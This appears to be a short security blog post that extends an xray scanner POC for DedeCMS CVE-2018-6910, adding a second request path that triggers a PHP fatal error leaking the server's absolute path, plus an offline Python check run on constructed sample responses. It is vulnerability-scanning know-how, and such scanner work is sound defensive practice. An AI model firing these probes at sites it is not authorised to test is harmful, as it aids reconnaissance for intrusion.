xray plugin improvement 2: poc-yaml-dedecms-cve-2018-6910
Preface
The original yml for poc-yaml-dedecms-cve-2018-6910:
dedecms-cve-2018-6910.yml
name: poc-yaml-dedecms-cve-2018-6910
rules:
  - method: GET
    path: /include/downmix.inc.php
    expression: |
      response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
detail:
  author: PickledFish(https://github.com/PickledFish)
  links:
    - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
This is actually incomplete: according to the description in links, there should be two URIs that can leak the real path.
So the improved yml should be:
name: poc-yaml-dedecms-cve-2018-6910-2poc
groups:
  poc1:
    - method: GET
      path: /include/downmix.inc.php
      expression: |
        response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
  poc2:
    - method: GET
      path: /dede/inc/inc_archives_functions.php
      expression: |
        response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("inc_archives_functions.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
detail:
  author: PickledFish(https://github.com/PickledFish)
  links:
    - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
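The following is an added example, not code from xray or from the POC author: an offline Python re-implementation of the two-group check, showing why the second group matters (in xray, a POC with groups is a hit when any one group matches) and what the error page actually discloses. The responses, the server path and the line number are constructed sample data; the function names are hypothetical.

```python
import re

# The two checks from the improved POC: (request path, file name expected in the error).
CHECKS = {
    "poc1": ("/include/downmix.inc.php", b"downmix.inc.php"),
    "poc2": ("/dede/inc/inc_archives_functions.php", b"inc_archives_functions.php"),
}

# A PHP fatal error ends with "in <absolute file> on line <n>"; capture the file.
LEAK_RE = re.compile(rb"in (?:<b>)?([^<\r\n]+?\.php)(?:</b>)? on line")


def rule_matches(status, body, filename):
    """Same condition as the POC expression for a single rule."""
    return (
        status == 200
        and b"Fatal error" in body
        and filename in body
        and b"Call to undefined function helper()" in body
    )


def evaluate(responses):
    """responses: {path: (status, body)}. Returns {group: leaked_path} for every
    group that matches; a non-empty result means the site would be flagged."""
    hits = {}
    for group, (path, filename) in CHECKS.items():
        status, body = responses.get(path, (0, b""))
        if rule_matches(status, body, filename):
            m = LEAK_RE.search(body)
            hits[group] = m.group(1).decode() if m else None
    return hits


# Constructed responses: the poc1 file is blocked (404), the poc2 file still leaks.
SAMPLE = {
    "/include/downmix.inc.php": (404, b"Not Found"),
    "/dede/inc/inc_archives_functions.php": (
        200,
        b"<br />\n<b>Fatal error</b>:  Call to undefined function helper() in "
        b"<b>/var/www/html/dede/inc/inc_archives_functions.php</b> on line <b>12</b><br />",
    ),
}

if __name__ == "__main__":
    print(evaluate(SAMPLE))
```

With the original single-rule POC this sample site would be reported clean, because only the first path is requested.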
This vulnerability is of little significance; I'm not sure why xray includes it.